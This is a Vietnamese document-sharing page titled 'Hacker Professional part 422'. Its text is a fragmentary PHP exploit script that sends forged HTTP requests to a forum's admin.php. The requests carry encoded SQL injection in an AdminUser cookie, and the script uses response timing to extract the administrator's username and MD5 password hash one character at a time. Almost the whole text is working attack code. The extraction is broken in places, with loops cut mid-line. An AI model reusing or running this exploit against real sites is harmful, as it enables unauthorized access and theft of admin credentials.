Hacker Professional part 422

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

Thêm vào BST

Báo xấu

35
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 422', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Hacker Professional part 422

echo "please wait...\n"; function StrCode($string,$action='ENCODE'){ $key = $GLOBALS['my_fragment']; $string = $action == 'ENCODE' ? $string : base64_decode($string); $len = 18; $code = ''; for($i=0; $i
sendpacketii($packet); $temp=explode("lastfid=",$html); $temp2=explode("Set-Cookie: ",$temp[0]); $cp=$temp2[1]; echo "cookie prefix -> ".$cp."\n"; if (!$e) { //see sql errors... you need a valid key for strcodeii() function, //so let's ask :) $tt="\t";for ($i=1; $i
for ($i=0; $i
$packet.="CLIENT-IP: 1.2.3.4\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); usleep(2000000); $starttime=time(); echo "starttime -> ".$starttime."\r\n"; sendpacketii($packet); if (eregi("You Can Get Help In",$html)) { die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version..."); } $endtime=time(); echo "endtime -> ".$endtime."\r\n"; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime."\r\n"; if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i
$packet ="GET ".$p."admin.php HTTP/1.0\r\n"; $packet.="CLIENT-IP: 1.2.3.4\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; $packet.="Accept: text/plain\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); usleep(2000000); $starttime=time(); echo "starttime -> ".$starttime."\r\n"; sendpacketii($packet); $endtime=time(); echo "endtime -> ".$endtime."\r\n"; $difftime=$endtime - $starttime; echo "difftime -> ".$difftime."\r\n"; if ($difftime > $timeout) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} if ($i==255) { die("\nExploit failed..."); } } $j++; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) { print_r(' -------------------------------------------------------------------------- admin user -> '.$admin.' pwd hash (md5) -> '.$password.' -------------------------------------------------------------------------- ');